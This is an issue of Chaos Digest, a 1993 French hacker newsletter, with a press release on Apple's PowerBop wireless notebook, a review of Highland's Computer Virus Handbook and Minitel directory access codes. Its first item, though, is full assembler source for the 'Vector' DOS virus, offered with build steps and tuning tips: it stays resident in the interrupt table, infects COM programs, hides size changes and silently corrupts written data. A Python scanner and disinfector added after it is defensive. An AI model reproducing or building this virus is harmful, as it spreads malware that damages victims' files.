Chaos Digest                Lundi 7 Juin 1993        Volume 1 : Numero 45
                            ISSN  1244-4901

      Editeur: Jean-Bernard Condat ([email protected])
      Archiviste: Yves-Marie Crabbe
      Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.45 (7 Juin 1993)
File 1--Le virus Vector (essai d'ecriture)
File 2--PowerBop, le portable Apple communicant sans fils (technique)
File 3--Critique de _Computer Virus Handbook_ de Highland (livre)
File 4--L'annuaire electronique [11] en langues etrangeres (acces)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
               [email protected]
with a mail header or first line containing the following information:
                   X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found on the ComNet BBS in Luxembourg (+352)
466893.  Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

       * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
       * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
       * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
       * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
       * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
       * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
       * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
       * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission.  Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications.  Articles are preferred to short responses.  Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
           the views of the moderators. Chaos Digest contributors
           assume all responsibility for ensuring that articles
           submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Wed, 2 Jun 1993 14:03:46 +0100 (WET DST)
From: [email protected] (Necros the Hacker )
Subject: File 1--Le virus Vector (essai d'ecriture)


                       The  Vector Virus
                               by
                       Necros the Hacker


This is a fairly simple virus I wrote a while back. However, for its size
it has some nice features, including

     * memory resident in the interrupt vector table;
     * hides file size increases;
     * infects COM programs on opening or execution;
     * small and subtle, but nasty, damage routine.

The main aim of the virus was to write something small and well-coded. At
376 bytes it's not tiny but it's small enough to fit into the interrupt
vector table. The side effects of placing the virus in the interrupt table
are that it may conflict with other programs which use the interrupts, but
more importantly it can go resident without users noticing a decrease in
system memory.

Ok, so that's the idea behind it. Now what does it do? Well, it's resident
in memory and infects COM programs when they're opened or executed. Notice
that's COM *programs*, not just files. It checks to see if the file is
actually a COM program with an EXE extension too. The virus has a timer
which counts up to 0FFFh & when this number of writes takes place in DOS
with the virus resident, it performs its damage. The damage is simply to
change the data that was written subtly --- a byte is dropped from the
start of the written block & appended to the end. So there's no change in
size of the file that was written. For EXE programs or archive programs or
backup programs this sort of error can ruin the whole file. At least it
makes the job of recovering the undamaged data from the damaged stuff very
difficult.

The virus also hides file size increases. Each infected file has its date
increased by a century, so it won't appear as being different in listings.
Only FCB calls are intercepted & massaged into subtracting the virus'
length. I couldn't be bothered to do it for handle calls because FCBs are used
in the DOS dir command.

Anyway, I present this code more as a demonstration of how to do some
common things efficiently. I'm mainly interested in writing good code, so
if anyone's got any suggestions on how to make it better, you can comment
here if the list maintainer is in agreement.

Oh, one last thing. The assembler code is turned into a COM program using
tasm & tlink. The resultant program is actually an infector of a program
called test.com. Just create a simple  3-byte program & then run
vector.com which will infect the test program. There's a message at the
end of the virus which can be removed if you want. Don't just overwrite it
with your own. Removing it is a matter of moving the line just after
message db . . . to just before it. Another thing you might want to modify
is the damage timer . . . change 0fffh in the code to some other value.
I'll leave you to figure out what to change it to yourself. It shouldn't be
too difficult :)

Have fun,
NTH

---------------------------------------------------------------------------
;VECTOR.ASM            Written by Necros the Hacker      12 Aug 1991
;TSR virus which resides in interrupt table

model tiny
code
     org 100h              ;makes no difference - relocatable
start:
     jmp shell             ;the non-resident part of the virus
;the three previous bytes are overwritten with host's first bytes
     org 103h
repair:
     mov si,[ds:101h]      ;find offset of virus from 100h
     mov di,100h           ;place to write original file bytes
     push di
     add si,di             ;si is now start of virus

     cld
     movsb
     movsw                 ;restore start of host

     push es
     xor bx,bx             ;suitably unused register
     mov es,bx
     mov cx,[es:0084h]     ;offset of int 21 handler
     mov dx,[es:0086h]     ;segment of int 21 handler
     push ax
     mov ax,4bf1h
     int 21h
     mov di,ax
     pop ax
     cmp di,0abc0h         ;signature
     jz restart_host       ;already installed

     sub si,3              ;point to start of virus again

;code to make resident and hook vectors
;first save the old vector (in this copy)
     mov (old_int_21-100h)[si],cx
     mov (old_int_21-0feh)[si],dx

;now make the copy!
     mov di,07bh*4
     mov cx,virus_length
     rep movsb

;now hook the vector proper
     cli
     mov [es:0084h],offset handler_offset
     mov [es:0086h],cx
     sti

;and fall through to restart the host

restart_host:
     pop es
     ret                   ;start host (note AX unchanged by virus)

jump_buf_offset equ $-100h+07bh*4
jump_buf db 0e9h,0,0        ;jump to replace start of host

modify_dir proc near
     pushf
     call dword ptr cs:chain_offset
     cmp al,0ffh
     je ret_error
     push es
     push bx
     push ax
     mov ah,2fh
     int 21h
     cmp byte ptr es:[bx],0ffh      ;is extended FCB?
     jne not_extended
     add bx,7
not_extended:
     cmp byte ptr es:[bx+1ah],51    ;year>2105 AD?
     jbe no_mods
     sub word ptr es:[bx+1dh],virus_length
no_mods:
     pop ax
     pop bx
     pop es
ret_error:
     iret

modify_dir endp

;new int 21 handler
     even                  ;although the virus is relocatable, it will
                           ;always be on an even address when resident

chain_offset equ $-100h+07bh*4       ;absolute address to chain to
old_int_21 dw 0,0

handler_offset equ $-100h+07bh*4
new_handler proc
     cmp ax,4bf1h          ;residency request
     jne is_dir
     mov ax,0abc0h
     iret

is_dir:
     cmp ah,11h
     je modify_dir
     cmp ah,12h
     je modify_dir

     cmp ah,40h            ;write?
     jne is_open
     cmp bl,3              ;don't affect stdout/stderr/stdin
     jb damage_ok
     inc dx                ;perform damage
     dec word ptr cs:[offset counter_offset]
     jz damage_ok
     dec dx                ;not time for damage, so undo it
damage_ok:
     and word ptr cs:[offset counter_offset],0fffh
     jmp normal_handler

is_open:
     cmp ah,3dh            ;open file (read only)
     jne is_exec

;infect only COM (or EXE) files when opened
     push ax
     push si
     mov si,dx
     cld
find_extension:
     lodsb
     or al,al
     je no_infect
     cmp al,'.'            ;look for the extension
     jne find_extension

;OK now check to see if the extension is COM or EXE
     lodsb
     or al,20h
     cmp al,'c'
     jne try_exe
     lodsw
     or ax,2020h
     cmp ax,'mo'
     jne no_infect
     je eligible
try_exe:
     lodsw
     or ax,2020h
     cmp ax,'ex'
     jne no_infect
eligible:
     pop si
     pop ax
     jmp infect_file

no_infect:
     pop si
     pop ax
     jmp normal_handler

is_exec:
     cmp ax,4b00h            ;EXEC?
     jne normal_handler

infect_file:
;code to infect the file
     push ax
     push bx
     push cx
     push dx
     push ds

;open the file for infecting
     mov ax,3d02h
     xor cx,cx
     pushf

     call dword ptr cs:chain_offset
     jc restore_regs
     mov bx,ax

     push cs
     pop ds

     mov ah,3fh            ;read from handle
     mov cx,3              ;first three bytes
     mov dx,07bh*4h        ;to start of virus (jumped over)
     int 21h
     jc no_date_set        ;only small files

     cmp ds:[07bh*4],'ZM'  ;EXE file?
     je no_date_set

     mov ax,5700h          ;get time and date stamp
     int 21h
     push cx
     push dx
     cmp dh,51             ;year>=2005 (1980+25+1 from month)
     ja close_file

     pop dx
     add dh,200            ;gives same year in next century
     push dx               ;will be set before closing

     mov ax,4202h          ;LSEEK to end of file
     xor cx,cx
     xor dx,dx
     int 21h

     mov word ptr offset jump_buf_offset+1,ax ;save length of host

;while we're here, append the virus
     mov ah,40h
     mov cx,virus_length
     mov dx,07bh*4
     int 21h
     jc close_file

     mov ax,4200h           ;LSEEK to start of file
     xor cx,cx
     xor dx,dx
     int 21h

     mov ah,40h             ;write with handle
     mov cx,3
     mov dx,offset jump_buf_offset
     int 21h

close_file:
     pop dx
     pop cx
     mov ax,5701h            ;reset time and date
     int 21h
no_date_set:
     mov ah,3eh
     int 21h
restore_regs:
     pop ds
     pop dx
     pop cx
     pop bx
     pop ax

normal_handler:               ;either open or EXEC
     jmp dword ptr cs:chain_offset
new_handler endp

counter_offset equ $-100h+07bh*4
counter dw 0                  ;when counter reaches zero, byte is "lost"

message db 'V3.0 [VECTOR] (c) Necros the Hacker',10,13
       db 'Written Aug 1991 in Tralee, Ireland',10,13

virus_length equ $-start

shell:
;open the file for infecting
     mov ax,3d02h
     xor cx,cx
     mov dx,offset filename
     int 21h
     jc shell_error
     mov bx,ax

     mov ah,3fh              ;read from handle
     mov cx,3                ;first three bytes
     mov dx,0100h            ;to start of virus (jumped over)
     int 21h
     jc shell_error

     mov ax,4202h            ;LSEEK to end of file
     xor cx,cx
     xor dx,dx
     int 21h

     mov word ptr jump_buf+1,ax    ;save length of host

;while we're here, append the virus
     mov ah,40h
     mov cx,virus_length
     mov dx,0100h
     int 21h
     jc shell_error

     mov ax,4200h            ;LSEEK to start of file
     xor cx,cx
     xor dx,dx
     int 21h

     mov ah,40h              ;write with handle
     mov cx,3
     mov dx,offset jump_buf
     int 21h

     mov ah,3eh
     int 21h

exit_stub:
     mov ax,4c00h
     int 21h
shell_error:
     mov ah,9
     mov dx,offset err$
     int 21h
     jmp exit_stub
err$ db 'Error infecting file',10,13,'$'
filename db 'test.com',0
end start

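As an added example (not part of the original post and not the author's code), here is a small static scanner in Python that applies the infection layout described above to flag and repair an infected COM image. It relies only on facts stated in the text: the 376-byte body appended to the host, the E9 xx xx prefix whose word is the original host length, the three original bytes saved at the start of the body, the trailing 'V3.0 [VECTOR]' message, and the one-century date bump. The function names and the sample "infected" image are mine; the sample is constructed filler with the marker appended, not a real virus body.

```python
"""Static detector / disinfector for COM files carrying the Vector layout.

Added example; not code from the original post.  Everything checked here
is taken from the description in File 1:
  - 376-byte body appended to the host;
  - first three host bytes replaced by E9 + 16-bit original host length;
  - the original three bytes saved at the start of the appended body;
  - body ends with 'V3.0 [VECTOR] (c) Necros the Hacker';
  - infected files get +100 years on their DOS date (only applied when the
    original date high byte was <= 51, i.e. year <= 2005).
"""
import struct

VIRUS_LENGTH = 376
MARKER = b"V3.0 [VECTOR]"          # from the message at the end of the body


def dos_date_year(date_word: int) -> int:
    """DOS directory date word: bits 15..9 hold the year since 1980."""
    return 1980 + (date_word >> 9)


def date_looks_bumped(date_word: int) -> bool:
    """A COM file dated 2080 or later is a strong indicator: the virus adds
    100 years, and it only infects files whose year is at most 2005."""
    return dos_date_year(date_word) >= 2080


def find_infection(data: bytes):
    """Return the original host length if the image matches the Vector
    layout (JMP prefix, length consistent with a 376-byte tail, marker in
    the tail), otherwise None.  Handle-based reads see the true file size,
    so the virus' FCB-only stealth does not affect this check."""
    if len(data) < VIRUS_LENGTH + 3 or data[0] != 0xE9:
        return None
    host_len = struct.unpack_from("<H", data, 1)[0]
    if host_len + VIRUS_LENGTH != len(data):
        return None
    if MARKER not in data[host_len:]:
        return None
    return host_len


def disinfect(data: bytes) -> bytes:
    """Undo the infection exactly as the virus' own 'repair' routine does:
    the saved three bytes come back to offset 0 and the tail is dropped."""
    host_len = find_infection(data)
    if host_len is None:
        raise ValueError("not a Vector-infected COM image")
    return data[host_len:host_len + 3] + data[3:host_len]


def build_sample_infected(host: bytes) -> bytes:
    """Constructed stand-in for an infected file, mirroring the layout the
    virus writes.  The body is NOP filler plus the marker, not the virus."""
    if len(host) < 3:
        raise ValueError("host must be at least three bytes")
    filler = b"\x90" * (VIRUS_LENGTH - 3 - len(MARKER) - 2)
    body = host[:3] + filler + MARKER + b"\r\n"
    assert len(body) == VIRUS_LENGTH
    return b"\xe9" + struct.pack("<H", len(host)) + host[3:] + body


if __name__ == "__main__":
    sample_host = bytes([0xB4, 0x4C, 0xCD, 0x21])   # constructed 4-byte COM
    image = build_sample_infected(sample_host)
    print("infected:", find_infection(image) is not None)
    print("repaired OK:", disinfect(image) == sample_host)
```

The marker test is the weakest part: the author explicitly invites readers to remove the message, so a practitioner should keep the structural check (E9 prefix plus a length that is exactly 376 bytes longer than the jump target) and the 2080-or-later date as the primary indicators. Note also that the FCB-only stealth described above hides the size increase from DIR but not from a handle-based read, which is what this scanner uses.
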
------------------------------

Date: Fri Jun  4 12:07:00 -0600 1993
From: [email protected] (cccf )
Subject: File 2--PowerBop, le portable Apple communicant sans fils (technique)

              Apple European R&D extends mobile computing
                    with wireless communications


Paris La Defense, June 4, 1993--With PowerBop, the first notebook
integrating cordless communications technology, recently launched in
France, Apple European R&D extends mobile computing and enhances
communications capabilities. PowerBop, the newest model of the popular
PowerBook series, offers the highest degree of autonomy on the notebook
computer market today.

The ongoing technical cooperation between the Apple European R&D Centre, based
in Paris, and France Telecom, the French PTO operator, resulted in the
integration of radio capabilities with notebook computers, making it
possible to connect them to Telepoint services.  Telepoint is expanding
more and more in Europe and uses the most affordable wireless technology
available today.

Apple European R&D focuses primarily on modems, on telecommunications in
mobile computers and on products that comply with OSI (Open Systems
Interconnection) standards.


PowerBop: A new dimension in communications freedom
+---------------------------------------------------

PowerBop brings notebook users an added dimension of freedom, above and
beyond the inherent benefits of Apple's popular PowerBook models.  The
PowerBop contains a radio modem conforming to the CT2 Telepoint standard, in
accordance with the Common Air Interface (CAI) adopted at the European
level in June 1991.  The CT2 standard allows a new generation of personal
telephones.  Their owners are able to use them in public places in large
cities, at home as a traditional cordless phone and in the office via PBX
extensions.

Within the PowerBop, the radio modem CT2 provides the ability to connect
it to a full range of communications services, at any time, from any place
located between 20 and 500 meters from the base station of the
Pointel network "Bi-Bop", launched by France Telecom in Paris and
Strasbourg on April 22,1993.  These services include: access to the France
Telecom videotex service "Minitel", message and file exchange, fax
transmission, access to servers and databases.

Thanks to the low energy consumption of the CT2 technology, the PowerBop
retains its 1 - 1/2 to 2 hours of endurance when the wireless modem is
being used.

The PowerBop features all the advantages of the PowerBook 180, Apple's
high-end notebook.  The internal floppy disk drive is replaced by the CT2
modem which means that users do not need to carry any additional equipment
to communicate via the telepoint network.  An external floppy disk drive is
supplied as a standard accessory.

Like the Bi-Bop pocket phone designed and developed by France Telecom, the
Apple PowerBop has a small antenna which folds into a special slot.

The Express Modem provided as standard equipment inside the PowerBop,
offers a full range of communications functions:

  * access to one of the 15,000 Minitel services;
  * fax transmission (reception will be available on the French
    network from September 1993);
  * data transmission from 300 to 14,400 bps.

The Express Modem can either be connected directly to a telephone line or
use the Bi-Bop network for wireless communications up to 9,600 bps.


Digital Cordless Market
+-----------------------

European operators view telepoint as a mass market application for wireless
telephones.  At the present time, no European country offers a nationwide
commercial telepoint service.  However there are currently a number of
networks of this type spreading out.  Mainly, in the UK, Netherlands,
Finland and Belgium.

In other parts of the world, other such developments are under way, in
Asia, Australia, Canada and the United States.

On the sales side, it appears that all the operators have a common desire
to implement a pricing structure to allow this technology to be affordable
for a consumer market.


France Telecom's new Bi-Bop service
+-----------------------------------

France Telecom took a leading role in the development of European telepoint
services.  On April 22, France Telecom launched the Bi-Bop cordless digital
pocket phone in Paris.  The system which employs the CT2 cordless standard,
sets up a digital radio link between the Bi-Bop terminal and a public or
home base station.

The Bi-Bop service covers three main types of use:

  * Public use: Bi-Bop subscribers can call anywhere in the world from
    major cities, starting with Paris and Strasbourg.  The network is
    designed to cover major thoroughfares and public places.  Today, some
    3,000 base stations (4,000 by fall 1993) span Paris and the greater
    Paris area (Ile-de-France) and the network will be progressively
    extended to other areas.  Starting in September 1993, subscribers will
    also be able to receive calls, and PowerBop notebook users will have
    fax reception capacities;

  * With a private home base station connected to a standard telephone
    outlet, the PowerBop is transformed into a high-performance mobile
    computing tool allowing one to access all private communications
    services;

  * Wireless PBXs are available to companies, allowing PowerBop users
    anywhere at a site, for example, to benefit from the same computing
    environment as if the user was at his desk.  The PowerBop can also
    become a mobile fax terminal.


Availability
+------------

The PowerBop will be available through certified Apple Computer France
distributors in June 1993.  PowerBop owners must have a special telephone
subscription with France Telecom.


Nota Bene
+---------

At this time, I am in a luxurious cafe on the Champs-Elysees in Paris, on
holiday, and I send this note to ChaosD with my PowerBop... without any
problem...

------------------------------

Date: Fri Jun  4 12:07:00 -0600 1993
From: [email protected] ("Rob Slade, DECrypt Editor, VARUG NLC rep )
Subject: File 3--Critique de _Computer Virus Handbook_ de Highland (livre)
Copyright: Robert M. Slade, 1993


Elsevier
Mayfield House
256 Banbury Road
Oxford OX2 7DH
England
655 Avenue of the Americas
New York, NY   10010
USA
212-989-5800
fax: 212-633-3990

             Computer Virus Handbook, Harold Joseph Highland
                        1990, 0-946395-46-2

When Dr. Highland first offered to send me a copy of this work, late in 1992,
he indicated that it was outdated.  In some respects this is true.  Some of
the precautions suggested in a few of the essays which Dr. Highland did not
write tend to sound quaint.  As one example, with the advantage of hindsight,
Jon David's ten page antiviral review checklist contains items of little use,
and has a number of important gaps.  However, for the "general", rather than
"specialist" audience, this work has much to recommend it.  The coverage is
both broad and practical, and the information, although not quite up to date,
is complete and accurate as far as it goes.

The book starts with, as the title has it, "Basic Definitions and Other
Fundamentals".  Dr. Highland has collected definitions from a number of
sources here, which makes a refreshing change from some of the dogmatic
assertions in other works.  The fact that the reader is left to make his own
final decision as to a working definition might be frustrating to some, but
is likely reasonable given that the argument over the definition of a virus
is still raging to this day.  With the changes that are still taking place
in terms of new "forms" of viral programs, it is unlikely that this debate
will be settled any time soon.

Chapter one also contains important background information on the operation of
the PC and the structure of MS-DOS format disks.  The one shortcoming might be
that so much of the book deals with MS-DOS machines that readers dealing with
other systems may fail to note the generic concepts contained therein.

Chapter two is a concise but encompassing overview of the viral situation by
William Hugh Murray.  Using epidemiology as a model, he covers the broad
outline of viral functions within a computing "environment", and examines some
theoretical guidelines to direct the building of policy and procedures for
prevention of viral infection.  The article is broadly helpful without ever
pushing the relation between computer viral and human epidemiology too far.

Chapter three deals with history and examples of specific viral programs. This
section is an extremely valuable resource.  While other works reviewed have
contained similar sections, the quality of this segment in Highland's tome is
impressive.  Mention must be made of the reports by Bill Kenny of Digital
Dispatch who provides detailed and accurate descriptions of the operations of
a number of viral programs which are, unfortunately, all still too common.
(Chapter four is similar, containing three reports of viral programs from
other sources.)

Large sections of the handbook deal with the evaluation and review of
antiviral software.  (I must say that I had great sympathy with that part of
the preface which dealt with some experiences encountered when trying to
test various packages.)  Chapter five gives an evaluation protocol and test
methodology.  The detail here may lead some to skip over it, but it is
helpful to those who wish to determine how thoroughly the testing was
conducted.  Chapter six, an article by Jon David as mentioned earlier, is
a suggested procedure and checklist for testing antiviral software.  This
chapter is unfortunately weak, and although there is some valuable direction,
one comes away with the impression that the important thing to test is
whether the program runs on a VGA monitor and has a bound manual.  One must,
of course, realize that antiviral testing was then in its infancy, and Mr.
David's article reflects the general tone of those times.  Chapter seven is
concerned with specific product evaluations, and, as most lists of its type
do, shows its age.  Of the twenty products listed, I recognize only seven
as still being in existence; of those that still do exist four have changed
substantially in the intervening three years.

Chapter eight is an essay by Harry de Maio entitled "Viruses - A Management
Issue", and it must be considered one of the "forgotten gems" of virus
literature.  It debunks a number of myths, and raises a number of issues
seldom discussed in corporate security and virus management.  Chapter nine
is similar, being Dr. Highland's suggested procedures for reducing the risk
of computer virus infection.

Chapter ten is a collection of essays on theoretical aspects of computer virus
research and defence.  Fred Cohen is heavily represented here, of course, but
not as singularly as in, for example, Hoffman's "Rogue Programs".

Dated as the book may be in some respects, it is still a valuable overview
for those wishing to study viral programs or the defence against them,
particularly in a corporate environment.  While some may find the book to
be "academic" in tone, it never launches into "blue sky" speculations: all
of the material here is realistic.  The "aging" of the product reviews makes
it difficult to consider it still a reference "handbook" or a "how to"
resource, but Dr. Highland's work is by no means to be discarded yet.

+++++++++++++++
Vancouver      [email protected]    | "Do you get guns with your
Institute for  [email protected] |  gun magazines?  No.
Research into  [email protected]    |  Do you get viruses with your
User           [email protected]    |  virus magazines?  Yes."
Security       Canada V7K 2G6      |               - Kevin Marcus

------------------------------

Date: 03 Jun 93 23:59:59 GMT
From: [email protected] (Jean-Bernard Condat )
Subject: File 4--L'annuaire electronique [11] en langues etrangeres (acces)
Repost from: [email protected]


Since the beginning of February, the French "Annuaire Electronique" is
available in Italian language. You can access it, from France, by
dialing 3614 code RAE, and from other countries, by MinitelNet or by a
telephone line: +33 36 43 14 14 code RAE (Ricerca Annuario
Elettronico).

            +----------------------------------------+
            |      *R*icerca                         |
            |      *A*nnuario                        |
            |      *E*lettronico                     |
            |                                        |
            |   1    Ricerca di un abbonato          |
            |                                        |
            |   2    LA POSTA : codice di            |
            |        avviamento postale              |
            |                                        |
            |   3    Sapere tutto sull'elenco        |
            |        elettronico                     |
            |                                        |
            |   4    Sapere tutto sul minitel        |
            |                                        |
            |   5    L'elenco elettronico            |
            |        e teletel dall'estero           |
            |                                        |
            |----------------------------------------|
            |          N! scelto: ...    poi  Invio  |
            | (C) France Telecom 1992                |
            +----------------------------------------+

For all versions, all diagnostics, instructions and the list of
professionals are translated into the appropriate language.  Five
different options are available: "Search for a subscriber", "The Post
Office: Postal Code", "All you need to know about the Electronic
Directory", "All you need to know about the Minitel", "Electronic
Directory and Teletel from abroad".

Called the "11" in France, this service is already available in:

  * English: 3614 code ED  [Electronic Directory];
  * Spanish: 3614 code GTE [Guia Telefonica Electronica];
  * German : 3614 code ETB [Elektronisches Telefonbuch].

------------------------------

End of Chaos Digest #1.45
************************************